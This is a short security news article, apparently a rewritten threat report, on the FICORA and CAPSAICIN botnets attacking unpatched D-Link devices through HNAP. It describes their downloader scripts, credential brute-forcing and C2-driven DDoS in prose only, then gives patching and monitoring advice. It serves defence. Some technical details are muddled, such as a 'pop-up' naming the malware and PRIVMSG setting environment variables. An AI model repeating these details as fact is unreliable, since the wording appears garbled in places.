Unpatched Legacy Devices Remain Vulnerable as Mirai and Keksec Variants Launch Fresh Attacks

2024-12-27

Legacy devices, those that are outdated and no longer supported by their manufacturers, pose a significant security risk. These devices often have known vulnerabilities that attackers can exploit to gain access to systems and launch attacks. This article discusses two recent botnet attacks, FICORA and CAPSAICIN, which targeted unpatched D-Link devices.

The article discusses two botnet attacks, FICORA and CAPSAICIN, that targeted unpatched D-Link devices in late 2024. The attackers exploited known vulnerabilities (CVE-2024-33112) in these devices using the HNAP protocol to execute malicious commands remotely. The FICORA botnet originated from servers located in the Netherlands and exhibited a widespread attack, while the CAPSAICIN botnet exhibited a brief but intense period of activity targeting East Asian countries.

The FICORA botnet deployed a shell script named “multi” to download the malware using various methods, including wget, ftpget, curl, and tftp. The downloader script targeted various Linux architectures and killed processes with the same extension as the malware “FICORA,” and then downloaded and executed malware encoded with ChaCha20. It is a Mirai variant, which employs hardcoded credentials for brute-force attacks, embeds a shell script to kill competing malware (“dvrHelper”), and leverages UDP, TCP, and DNS protocols for DDoS attacks.

The CAPSAICIN botnet used a downloader script named “bins.sh” to retrieve and execute the malware targeting various Linux architectures. The malware variant name is revealed upon execution through a pop-up displaying “CAPSAICIN.” “CAPSAICIN” malware establishes a connection with its C2 server, sending victim host information, then awaits commands from the C2 server, which it executes, and also uses the “PRIVMSG” function to set environment variables, enabling the C2 server to remotely control the compromised system. It is likely a variant of the Keksec group’s botnet and leverages the “PRIVMSG” function to execute DDoS attacks via commands received from a C2 server, which along with accompanying help messages, enable the malware to perform various attack functions, suggesting its development was influenced by version 17.0.0 of the Keksec group’s botnet.

What Undercode Says:

The emergence of these botnet attacks highlights the continued risk posed by unpatched legacy devices. These devices are often easy targets for attackers, as they have known vulnerabilities that can be exploited. The fact that these attacks were successful despite patches being available underscores the importance of timely patching and implementing robust security measures.

Here are some additional analytics related to the blog article:

The article emphasizes the importance of patching legacy devices. This is a critical security practice that can help to mitigate the risk of attacks.
The article also highlights the need for robust monitoring. By monitoring systems for suspicious activity, organizations can identify and respond to attacks more quickly.
The article discusses the use of hardcoded credentials and brute-force attacks by the FICORA botnet. This is a common tactic used by attackers to gain access to systems. Organizations can help to mitigate this risk by using strong passwords and enabling multi-factor authentication.
The article also discusses the use of the “PRIVMSG” function by the CAPSAICIN botnet to execute DDoS attacks. This is a technique that can be used to overwhelm a target system with traffic, making it unavailable to legitimate users. Organizations can help to mitigate this risk by implementing DDoS protection measures.

By following these security best practices, organizations can help to protect themselves from attacks like those discussed in the blog article.